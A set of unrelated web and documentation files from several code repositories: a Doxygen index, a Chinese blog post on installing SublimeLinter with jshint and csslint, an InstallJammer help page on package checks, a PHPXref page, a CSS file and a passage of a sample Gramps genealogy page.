<li class="current"><a href="functions_0x6f.html#index_o"><span>o</span></a></li>
<li><a href="functions_0x70.html#index_p"><span>p</span></a></li>
<li><a href="functions_0x71.html#index_q"><span>q</span></a></li>
<li><a href="functions_0x72.html#index_r"><span>r</span></a></li>
<li><a href="functions_0x73.html#index_s"><span>s</span></a></li>
<li><a href="functions_0x74.html#index_t"><span>t</span></a></li>
<li><a href="functions_0x75.html#index_u"><span>u</span></a></li>
<li><a href="functions_0x77.html#index_w"><span>w</span></a></li>
</ul>
</div>
</div>
<div class="contents">
<div class="textblock">Here is a list of all documented class members with links to the class documentation for each member:</div>
<h3><a class="anchor" id="index_o"></a>- o -</h3><ul>
<li>ObjectToByteArray()
: <a class="el" href="class_command_messenger_1_1_struct_serializer.html#a1d48ad165ab583f881b4a9816f3a6b8d">CommandMessenger.StructSerializer</a>
</li>
<li>Ok
: <a class="el" href="class_command_messenger_1_1_command.html#ad6a5e59f053eb98988ff09655853bfb3">CommandMessenger.Command</a>
</li>
<li>OnDequeue()
: <a class="el" href="class_command_messenger_1_1_stale_general_strategy.html#a77145d833ce8b7224125c0337756987a">CommandMessenger.StaleGeneralStrategy</a>
, <a class="el" href="class_command_messenger_1_1_general_strategy.html#a722c70e12ee1744c7f37a443018e5451">CommandMessenger.GeneralStrategy</a>
</li>
<li>OnEnqueue()
: <a class="el" href="class_command_messenger_1_1_general_strategy.html#a87e9577c70e56ae3772f956a26141aca">CommandMessenger.GeneralStrategy</a>
</li>
<li>Open()
: <a class="el" href="class_command_messenger_1_1_transport_layer_1_1_serial_transport.html#aefb25e0a4fcf8e9a49cb337be84e2331">CommandMessenger.TransportLayer.SerialTransport</a>
</li>
</ul>
</div><!-- contents -->
<hr class="footer"/><address class="footer"><small>
Generated on Tue Dec 31 2013 15:04:05 for CmdMessenger by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.7.6.1
</small></address>
</body>
</html>
|
_site/sublime/2015/03/26/sublimeLinter.html | lyf1986/lyf1986.github.io | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>代码校验工具 SublimeLinter 的安装与使用</title>
<meta name="description" content="代码校验工具 sublimeLinter 的安装与使用,jshint 的安装与使用,JavaScript 语法检查校验,JavaScript 语法提示">
<link rel="stylesheet" href="/css/main.css">
<link rel="canonical" href="http://yourdomain.com/sublime/2015/03/26/sublimeLinter.html">
<link rel="alternate" type="application/rss+xml" title="Your awesome title" href="http://yourdomain.com/feed.xml" />
</head>
<body>
<header class="site-header">
<div class="wrapper">
<a class="site-title" href="/">Your awesome title</a>
<nav class="site-nav">
<a href="#" class="menu-icon">
<svg viewBox="0 0 18 15">
<path fill="#424242" d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.031C17.335,0,18,0.665,18,1.484L18,1.484z"/>
<path fill="#424242" d="M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0c0-0.82,0.665-1.484,1.484-1.484 h15.031C17.335,6.031,18,6.696,18,7.516L18,7.516z"/>
<path fill="#424242" d="M18,13.516C18,14.335,17.335,15,16.516,15H1.484C0.665,15,0,14.335,0,13.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.031C17.335,12.031,18,12.696,18,13.516L18,13.516z"/>
</svg>
</a>
<div class="trigger">
<a class="page-link" href="/about/">About</a>
</div>
</nav>
</div>
</header>
<div class="page-content">
<div class="wrapper">
<div class="post">
<header class="post-header">
<h1 class="post-title">代码校验工具 SublimeLinter 的安装与使用</h1>
<p class="post-meta">Mar 26, 2015</p>
</header>
<article class="post-content">
<ul id="markdown-toc">
<li><a href="#section" id="markdown-toc-section">序</a></li>
<li><a href="#sublimelinter" id="markdown-toc-sublimelinter">安装 SublimeLinter</a></li>
<li><a href="#javascript-" id="markdown-toc-javascript-">JavaScript 语法检查</a> <ul>
<li><a href="#sublimelinter-jshint" id="markdown-toc-sublimelinter-jshint">安装 SublimeLinter-jshint</a></li>
<li><a href="#nodejs--jshint" id="markdown-toc-nodejs--jshint">安装 nodeJS 和 jshint</a></li>
</ul>
</li>
<li><a href="#css-" id="markdown-toc-css-">css 语法检查</a> <ul>
<li><a href="#sublimelinter-csslint" id="markdown-toc-sublimelinter-csslint">安装 SublimeLinter-csslint</a></li>
<li><a href="#nodejs--csslint" id="markdown-toc-nodejs--csslint">在 nodeJS 下安装 csslint</a></li>
</ul>
</li>
</ul>
<h2 id="section">序</h2>
<p>本文我将讲述一下 SublimeLinter 的安装过程。 <br />
其组件 jshint 的安装与使用。 <br />
其组件 csslint 的安装与使用。 <br />
我将基于 <a href="http://sublimetext.com/3">Sublime Text 3</a> 来安装。 <br />
使用 Sublime Text 2 的用户阅读本文是没有帮助的。</p>
<p>SublimeLinter 是 Sublime 的插件,它的作用是检查代码语法是否有错误,并提示。习惯了 IDE 下写代码的人一定需要一款在 Sublime 上类似的语法检查工具。下面我们开始。</p>
<hr />
<h2 id="sublimelinter">安装 SublimeLinter</h2>
<p>如同其他插件一样使用 Package Control 来安装。</p>
<ol>
<li>按下 <code>Ctrl+Shift+p</code> 进入 Command Palette</li>
<li>输入<code>install</code>进入 Package Control: Install Package</li>
<li>输入<code>SublimeLinter</code>。进行安装.</li>
</ol>
<p><img src="http://7q5cdt.com1.z0.glb.clouddn.com/SublimeLinter-sublimeLinter.jpg" alt="SublimeLinter" /></p>
<p>安装完成后可以看到这样一段话:</p>
<pre><code class="markdown">Welcome to SublimeLinter, a linter framework for Sublime Text 3.
* * * IMPORTANT! * * *
SublimeLinter 3 is NOT a drop-in replacement for
earlier versions.
Linters *NOT* included with SublimeLinter 3,
they must be installed separately.
The settings are different.
* * * READ THE DOCS! * * *
Otherwise you will never know how to install linters, nor will
you know about all of the great new features in SublimeLinter 3.
For complete documentation on how to install and use SublimeLinter,
please see:
http://www.sublimelinter.com</code></pre>
<p>可以看到具体的 Linters 组件<strong>不</strong>被包含在 SublimeLinter 3 中,所以我们要额外独立安装组件。 <br />
可以针对不同的语言安装不同的组件。</p>
<hr />
<h2 id="javascript-">JavaScript 语法检查</h2>
<p>SublimeLinter-jshint 是基于 nodeJS 下的 jshint 的插件,实际上 SublimeLinter-jshint 调用了 nodeJS 中 jshint 的接口来进行语法检查的。</p>
<hr />
<h3 id="sublimelinter-jshint">安装 SublimeLinter-jshint</h3>
<p>为了让 JavaScript 代码有语法检查,我们安装 SublimeLinter-jshint <br />
同样的方法,我们安装 SublimeLinter-jshint</p>
<ol>
<li>按下 <code>Ctrl+Shift+p</code> 进入 Command Palette</li>
<li>输入<code>install</code>进入 Package Control: Install Package</li>
<li>输入<code>SublimeLinter-jshint</code>。进行安装.</li>
</ol>
<p>如下图</p>
<p><img src="http://7q5cdt.com1.z0.glb.clouddn.com/SublimeLinter-jshint.jpg" alt="SublimeLinter-jshint" /></p>
<p>安装完成后我们可以看到下面的一段话</p>
<pre><code class="markdown">SublimeLinter-jshint
-------------------------------
This linter plugin for SublimeLinter provides an interface to jshint.
** IMPORTANT! **
Before this plugin will activate, you *must*
follow the installation instructions here:
https://github.com/SublimeLinter/SublimeLinter-jshint
</code></pre>
<hr />
<h3 id="nodejs--jshint">安装 nodeJS 和 jshint</h3>
<p>在插件开始工作之前,我们必须再看一下上述插件的<a href="https://github.com/SublimeLinter/SublimeLinter-jshint">安装说明</a> <br />
通过 <a href="https://github.com/SublimeLinter/SublimeLinter-jshint">SublimeLinter-jshint 的说明</a> 我们可以看到,这个组件依赖于 nodeJS 下的 jshint,所以我们安装 nodeJS 环境和 nodeJS 下的 jshint。</p>
<ol>
<li>安装 <a href="https://nodejs.org/">Node.js</a></li>
<li>通过 npm 安装<code>jshint</code></li>
</ol>
<p>在命令行下输入如下代码,完成安装</p>
<pre><code>npm install -g jshint
</code></pre>
<p>安装完成后命令行中出现如下的信息</p>
<pre><code>C:\Users\Administrator\AppData\Roaming\npm\jshint -> C:\Users\Administrator\AppData\Roaming\npm\node_modules\jshint\bin\jshint
jshint@2.6.3 C:\Users\Administrator\AppData\Roaming\npm\node_modules\jshint
├── strip-json-comments@1.0.2
├── underscore@1.6.0
├── exit@0.1.2
├── shelljs@0.3.0
├── console-browserify@1.1.0 (date-now@0.1.4)
├── htmlparser2@3.8.2 (domelementtype@1.3.0, entities@1.0.0, domhandler@2.3.0, readable-stream@1.1.13, domutils@1.5.1)
├── minimatch@1.0.0 (sigmund@1.0.0, lru-cache@2.5.0)
└── cli@0.6.6 (glob@3.2.11)
</code></pre>
<p>可以查看 jshint 版本,已确认安装完成。</p>
<pre><code>C:\Users\Administrator>jshint -v
jshint v2.6.3
</code></pre>
<p>现在,恭喜你,我们使用 Sublime 编辑 JavaScript 文件,就会有语法检查了!</p>
<p>在编辑过程中,会有如下提示</p>
<p><img src="http://7q5cdt.com1.z0.glb.clouddn.com/SublimeLinter-jshint-test.jpg" alt="SublimeLinter-jshint-test" /></p>
<p>点击提示点后,Sublime 状态栏也会有相应的说明</p>
<p><img src="http://7q5cdt.com1.z0.glb.clouddn.com/SublimeLinter-jshint-test2.jpg" alt="SublimeLinter-jshint-test2" /></p>
<hr />
<h2 id="css-">css 语法检查</h2>
<p>与 jshint 同理,SublimeLinter-csslint 也是基于 nodeJS 下的 csslint 的插件,实际上 SublimeLinter-csslint 调用了 nodeJS 中 csslint 的接口来进行语法检查的。</p>
<hr />
<h3 id="sublimelinter-csslint">安装 SublimeLinter-csslint</h3>
<p>同样的方法。</p>
<ol>
<li>按下 <code>Ctrl+Shift+p</code> 进入 Command Palette</li>
<li>输入<code>install</code>进入 Package Control: Install Package</li>
<li>输入<code>SublimeLinter-csslint</code>。进行安装.</li>
</ol>
<p>如下图</p>
<p><img src="http://7q5cdt.com1.z0.glb.clouddn.com/SublimeLinter-csslint.jpg" alt="SublimeLinter-csslint" /></p>
<p>安装完成后我们可以看到下面的一段话</p>
<pre><code>SublimeLinter-csslint
-------------------------------
This linter plugin for SublimeLinter provides an interface to csslint.
** IMPORTANT! **
Before this plugin will activate, you *must*
follow the installation instructions here:
https://github.com/SublimeLinter/SublimeLinter-csslint
</code></pre>
<p>在使用插件之前,必须遵循上述网址中的<a href="https://github.com/SublimeLinter/SublimeLinter-csslint">安装说明</a></p>
<hr />
<h3 id="nodejs--csslint">在 nodeJS 下安装 csslint</h3>
<p>进入上述的 GitHub 地址,csslint 的说明页。我们知道了和 jshint 一样,csslint 也是基于 nodeJS 下的 csslint 来使用的。</p>
<p>这里安装 nodeJS 过程省略。 <br />
只需用 npm 安装 csslint 即可。</p>
<p>在命令行中输入</p>
<pre><code>npm install -g csslint
</code></pre>
<p>安装完成后命令行中出现如下的信息</p>
<pre><code>C:\Users\Administrator\AppData\Roaming\npm\csslint -> C:\Users\Administrator\AppData\Roaming\npm\node_modules\csslint\cli.js
csslint@0.10.0 C:\Users\Administrator\AppData\Roaming\npm\node_modules\csslint
└── parserlib@0.2.5
</code></pre>
<p>可以查看 csslint 版本,已确认安装完成。</p>
<pre><code>C:\Users\Administrator>csslint --version
v0.10.0
</code></pre>
<p>现在,恭喜你,我们使用 Sublime 编辑 css 文件,就会有语法检查了!</p>
<p>在编辑过程中,会有如下提示</p>
<p><img src="http://7q5cdt.com1.z0.glb.clouddn.com/SublimeLinter-csslint-test.jpg" alt="SublimeLinter-csslint-test" /></p>
<p>点击提示点后,Sublime 状态栏也会有相应的说明</p>
<p><img src="http://7q5cdt.com1.z0.glb.clouddn.com/SublimeLinter-csslint-test2.jpg" alt="SublimeLinter-csslint-test2" /></p>
</article>
</div>
</div>
</div>
<footer class="site-footer">
<div class="wrapper">
<h2 class="footer-heading">Your awesome title</h2>
<div class="footer-col-wrapper">
<div class="footer-col footer-col-1">
<ul class="contact-list">
<li>Your awesome title</li>
<li><a href="mailto:your-email@domain.com">your-email@domain.com</a></li>
</ul>
</div>
<div class="footer-col footer-col-2">
<ul class="social-media-list">
<li>
<a href="https://github.com/jekyll">
<span class="icon icon--github">
<svg viewBox="0 0 16 16">
<path fill="#828282" d="M7.999,0.431c-4.285,0-7.76,3.474-7.76,7.761 c0,3.428,2.223,6.337,5.307,7.363c0.388,0.071,0.53-0.168,0.53-0.374c0-0.184-0.007-0.672-0.01-1.32 c-2.159,0.469-2.614-1.04-2.614-1.04c-0.353-0.896-0.862-1.135-0.862-1.135c-0.705-0.481,0.053-0.472,0.053-0.472 c0.779,0.055,1.189,0.8,1.189,0.8c0.692,1.186,1.816,0.843,2.258,0.645c0.071-0.502,0.271-0.843,0.493-1.037 C4.86,11.425,3.049,10.76,3.049,7.786c0-0.847,0.302-1.54,0.799-2.082C3.768,5.507,3.501,4.718,3.924,3.65 c0,0,0.652-0.209,2.134,0.796C6.677,4.273,7.34,4.187,8,4.184c0.659,0.003,1.323,0.089,1.943,0.261 c1.482-1.004,2.132-0.796,2.132-0.796c0.423,1.068,0.157,1.857,0.077,2.054c0.497,0.542,0.798,1.235,0.798,2.082 c0,2.981-1.814,3.637-3.543,3.829c0.279,0.24,0.527,0.713,0.527,1.437c0,1.037-0.01,1.874-0.01,2.129 c0,0.208,0.14,0.449,0.534,0.373c3.081-1.028,5.302-3.935,5.302-7.362C15.76,3.906,12.285,0.431,7.999,0.431z"/>
</svg>
</span>
<span class="username">jekyll</span>
</a>
</li>
<li>
<a href="https://twitter.com/jekyllrb">
<span class="icon icon--twitter">
<svg viewBox="0 0 16 16">
<path fill="#828282" d="M15.969,3.058c-0.586,0.26-1.217,0.436-1.878,0.515c0.675-0.405,1.194-1.045,1.438-1.809
c-0.632,0.375-1.332,0.647-2.076,0.793c-0.596-0.636-1.446-1.033-2.387-1.033c-1.806,0-3.27,1.464-3.27,3.27 c0,0.256,0.029,0.506,0.085,0.745C5.163,5.404,2.753,4.102,1.14,2.124C0.859,2.607,0.698,3.168,0.698,3.767 c0,1.134,0.577,2.135,1.455,2.722C1.616,6.472,1.112,6.325,0.671,6.08c0,0.014,0,0.027,0,0.041c0,1.584,1.127,2.906,2.623,3.206 C3.02,9.402,2.731,9.442,2.433,9.442c-0.211,0-0.416-0.021-0.615-0.059c0.416,1.299,1.624,2.245,3.055,2.271 c-1.119,0.877-2.529,1.4-4.061,1.4c-0.264,0-0.524-0.015-0.78-0.046c1.447,0.928,3.166,1.469,5.013,1.469 c6.015,0,9.304-4.983,9.304-9.304c0-0.142-0.003-0.283-0.009-0.423C14.976,4.29,15.531,3.714,15.969,3.058z"/>
</svg>
</span>
<span class="username">jekyllrb</span>
</a>
</li>
</ul>
</div>
<div class="footer-col footer-col-3">
<p class="text">Write an awesome description for your new site here. You can edit this line in _config.yml. It will appear in your document head meta (for Google search results) and in your feed.xml site description.
</p>
</div>
</div>
</div>
</footer>
</body>
</html>
|
app/assets/partials/doc/chromosome-entries.html | calipho-sib/nextprot-ui | <link href='../../elements/nextprot-elements/chromosome-entry-view.html' rel='import' type='text/html'>
<link href='../../elements/nextprot-elements/chromosome-list-view.html' rel='import' type='text/html'>
<div id="kentries" class="vertical-section-container centered">
<div class="col-xs-12 col-lg-12 main" ng-controller="chromosomeCtrl">
<chromosome-list-view ng-if="displayAllChromosomes()" nx-config="{{npEnv}}"></chromosome-list-view>
<chromosome-entry-view ng-if="!displayAllChromosomes()" nx-config="{{npEnv}}" chromosome="{{getSelectedPage()}}"></chromosome-entry-view>
</div >
</div> |
profiles/crm_core_np/modules/crm_core_features/crm_core_donation/modules/crm_core_donation_lb/crm_core_donation_lb.css | Trellon/crmcoredemo | /**
* Css page
*/
#donation_leader {
margin-top: 20px;
border-bottom: 1px solid grey;
padding-bottom:10px;
overflow:hidden;
}
#donation_leader .position {
font-size:64px;
font-weight:bold;
float:left;
border: 1px solid grey;
padding:20px 15px;
height:95px;
}
#donation_leader .picture {
float:left;
margin-left: 5px;
text-align:center;
}
#donation_leader .description {
float:left;
margin-left: 15px;
width:600px;
}
#donation_leader .picture img {
width:100px;
height:100px;
}
#donation_leader .picture span a {
font-weight:bold;
}
#donation_leader .amount {
float:right;
margin-right:20px;
font-size:28px;
font-weight:bold;
text-align:center;
}
.view-id-donation_leaderboard.view-display-id-page .views-field-picture img {
width: 32px;
height: 32px;
}
|
docs/html/PackageTestCondition.html | electric-cloud/installjammer | <!-- saved from url=(0014)about:internet -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><TITLE>Package Test Condition</TITLE><meta name="generator" content="Fast-Help"><meta name="keywords" content="Package Test Condition">
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
#FHNonScroll
{padding: 6px 6px 0px 6px; border-bottom: none; background: #D1D1D1; vertical-align: top;z-index: 2; visibility: visible; position: absolute; left: 0; top: 0; width: 100%; }
#FHScroll
{left: 0; top: 0px; position: absolute; margin: 0; padding: 10px; z-index: 1; background-repeat: no-repeat; background-position: bottom right; background-attachment: fixed; }
/* ========== Text Styles ========== */
hr { color: #000000}
body, table /* Normal */
{
font-size: 10pt;
font-family: 'Arial';
font-style: normal;
font-weight: normal;
color: #000000;
text-decoration: none;
}
span.rvts1
{
font-family: 'Arial Unicode MS';
}
span.rvts2
{
font-family: 'Verdana';
color: #000000;
}
span.rvts3
{
font-family: 'Verdana';
font-weight: bold;
color: #000000;
}
span.rvts4
{
font-family: 'Verdana';
color: #ff0000;
}
a.rvts5, span.rvts5
{
font-family: 'Verdana';
color: #0000ff;
text-decoration: underline;
}
a.rvts5:hover { color: #0000ff; }
span.rvts6
{
font-family: 'Verdana';
}
/* ========== Para Styles ========== */
p,ul,ol /* Left */
{
text-align: left;
text-indent: 0px;
padding: 0px 0px 0px 0px;
margin: 0px 0px 0px 0px;
}
.rvps1
{
}
--></style>
<script type="text/javascript" language="JavaScript" src="FHUtilities.js"></script>
<script type="text/JavaScript" language="JavaScript">
<!-- If this page is displayed outside of the Website Help Frameset, then reload in the Frame set
if (parent.location.href == self.location.href)
{location.href = "index.html?"+extractFileNameWithoutKnownExtension(location.href);}
//--></script>
<script type="text/javascript" language="JavaScript" src="FHNonscroll.js"></script><script type="text/javascript" language="JavaScript" src="FHUtilities.js"></script></HEAD>
<body bgcolor="#FFFFFF" scroll="no"><div id="FHNonScroll"><table width="100%" border="0" cellspacing="0" cellpadding="2"><tr><td width="100%" align="left">
<font size=2 color="#000000" face="Arial">
<div><font size=5 color="#333333" face="Verdana"><b>Package Test Condition</b></font></div>
</font>
</TD><td width="120" align="right" nowrap><font face="Verdana" size="2"><a href="EnvironmentVariableTestCondition.html"><img src="Images/BrowseBlueLeft.png" border="0" alt="Previous Topic"></a> <a href="PortTestCondition.html"><img src="Images/BrowseBlueRight.png" border="0" alt="Next Topic"></a> </font></td></tr></table></div><div id="FHScroll">
<p class=rvps1><span class=rvts2>This condition checks to see if a package is installed in the target system's default package manager. This condition will determine what the default package manager is for the target system and then attempt to determine if the given package is installed by querying the package manager.</span></p>
<p class=rvps1><span class=rvts2><br></span></p>
<div class=rvps1><table border=0 cellpadding=1 cellspacing=2 style="border-width: 0px;">
<tr valign=top>
<td width=22>
<p class=rvps1><img border="0" src="Images/note.jpg" alt="Note" width="32" height="32"></p>
</td>
<td width=604>
<p class=rvps1><span class=rvts4>Currently-supported package systems are: DPKG and RPM.</span></p>
</td>
</tr>
</table>
</div>
<p class=rvps1><span class=rvts6><br></span></p>
<div class=rvps1><table border=0 cellpadding=1 cellspacing=2 style="border-width: 0px;">
<tr valign=top>
<td width=32>
<p class=rvps1><img border="0" src="Images/detail.jpg" alt="Technical Detail" width="32" height="32"></p>
</td>
<td width=610>
<p class=rvps1><span class=rvts4>RPM will use 'rpm -q $package'</span></p>
<p class=rvps1><span class=rvts4><br></span></p>
<p class=rvps1><span class=rvts4>and</span></p>
<p class=rvps1><span class=rvts4><br></span></p>
<p class=rvps1><span class=rvts4>DPKG will use 'dpkg -s $package'</span></p>
<p class=rvps1><span class=rvts4><br></span></p>
<p class=rvps1><span class=rvts4>and then check the exit code.</span></p>
</td>
</tr>
</table>
</div>
<p class=rvps1><span class=rvts6><br></span></p>
<p class=rvps1><span class=rvts6><br></span></p>
<p class=rvps1><span class=rvts2><br></span></p>
<p class=rvps1><span class=rvts3>Standard Properties </span></p>
<p class=rvps1><span class=rvts2>See </span><a class=rvts5 href="ConditionStandardProperties.html">Standard Condition Properties</a><span class=rvts2>.</span></p>
<p class=rvps1><span class=rvts2><br></span></p>
<p class=rvps1><span class=rvts2><br></span></p>
<p class=rvps1><span class=rvts3>Advanced Properties</span></p>
<p class=rvps1><span class=rvts2><br></span></p>
<p class=rvps1><span class=rvts3>Operator</span></p>
<div class=rvps1><table border=0 cellpadding=1 cellspacing=2 style="border-width: 0px;">
<tr valign=top>
<td width=148>
<p class=rvps1><span class=rvts3> is installed</span></p>
</td>
<td width=614>
<p class=rvps1><span class=rvts2>True if the package is installed.</span></p>
</td>
</tr>
<tr valign=top>
<td width=148>
<p class=rvps1><span class=rvts3> is not installed</span></p>
</td>
<td width=614>
<p class=rvps1><span class=rvts2>True if the package is not installed.</span></p>
</td>
</tr>
</table>
</div>
<p class=rvps1><span class=rvts2><br></span></p>
<p class=rvps1><span class=rvts3>Package</span></p>
<p class=rvps1><span class=rvts2>The name of the package to check.</span><span class=rvts1></span></p>
</div></body></html>
|
inc/tools/views/_email_sent_details.view.php.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Detail view of _email_sent_details.view.php</title>
<link rel="stylesheet" href="../../../sample.css" type="text/css">
<link rel="stylesheet" href="../../../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../../../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../../../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../../../';
subdir='inc/tools/views';
filename='_email_sent_details.view.php.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../../../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../../../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../../../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../../../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../../../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../../../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h2 class="details-heading"><a href="./index.html">/inc/tools/views/</a> -> <a href="_email_sent_details.view.php.source.html">_email_sent_details.view.php</a> (summary)</h2>
<div class="details-summary">
<p class="viewlinks">[<a href="_email_sent_details.view.php.source.html">Source view</a>]
[<a href="javascript:window.print();">Print</a>]
[<a href="../../../_stats.html">Project Stats</a>]</p>
<p><b>This file implements the UI view for Tools > Email > Sent</b></p>
<table>
<tr><td align="right">File Size: </td><td>74 lines (3 kb)</td></tr>
<tr><td align="right">Included or required:</td><td>0 times</td></tr>
<tr><td align="right" valign="top">Referenced: </td><td>0 times</td></tr>
<tr><td align="right" valign="top">Includes or requires: </td><td>0 files</td></tr>
</table>
</div>
<br><div class="details-funclist">
</div>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
gramps42/gramps/example_NAVWEB1/ppl/w/w/0GDKQC54XKSWZKEBWW.html | belissent/testing-example-reports | <!DOCTYPE html>
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-US">
<title>My Family Tree - Howell, John</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mobile-web-app-capable" content="yes" />
<meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" />
<meta name="author" content="" />
<link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" />
<link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" />
<link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" />
<link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="header">
<h1 id="SiteTitle">My Family Tree</h1>
</div>
<div class="wrapper" id="nav" role="navigation">
<div class="container">
<ul class="menu" id="dropmenu">
<li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li>
<li><a href="../../../index.html" title="Surnames">Surnames</a></li>
<li><a href="../../../families.html" title="Families">Families</a></li>
<li><a href="../../../places.html" title="Places">Places</a></li>
<li><a href="../../../sources.html" title="Sources">Sources</a></li>
<li><a href="../../../repositories.html" title="Repositories">Repositories</a></li>
<li><a href="../../../media.html" title="Media">Media</a></li>
<li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li>
<li><a href="../../../addressbook.html" title="Address Book">Address Book</a></li>
</ul>
</div>
</div>
<div class="content" id="IndividualDetail">
<h3>Howell, John<sup><small> <a href="#sref1">1</a></small></sup></h3>
<div id="summaryarea">
<table class="infolist">
<tr>
<td class="ColumnAttribute">Birth Name</td>
<td class="ColumnValue">
Howell, John
</td>
</tr>
<tr>
<td class="ColumnAttribute">Gramps ID</td>
<td class="ColumnValue">I0988</td>
</tr>
<tr>
<td class="ColumnAttribute">Gender</td>
<td class="ColumnValue">male</td>
</tr>
<tr>
<td class="ColumnAttribute">Age at Death</td>
<td class="ColumnValue">unknown</td>
</tr>
</table>
</div>
<div class="subsection" id="events">
<h4>Events</h4>
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Birth
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace">
<a href="../../../plc/k/i/PQVJQC7W3OFQB38JIK.html" title="Loveland, Larimer, CO, USA">
Loveland, Larimer, CO, USA
</a>
</td>
<td class="ColumnDescription">
Birth of Howell, John
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
<tr>
<td class="ColumnEvent">
Death
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace">
<a href="../../../plc/5/8/QG7KQCWSCNY6E3EW85.html" title="Del Rio, Val Verde, TX, USA">
Del Rio, Val Verde, TX, USA
</a>
</td>
<td class="ColumnDescription">
Death of Howell, John
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
<tr>
<td class="ColumnEvent">
Burial
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace">
<a href="../../../plc/5/8/QG7KQCWSCNY6E3EW85.html" title="Del Rio, Val Verde, TX, USA">
Del Rio, Val Verde, TX, USA
</a>
</td>
<td class="ColumnDescription">
Burial of Howell, John
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
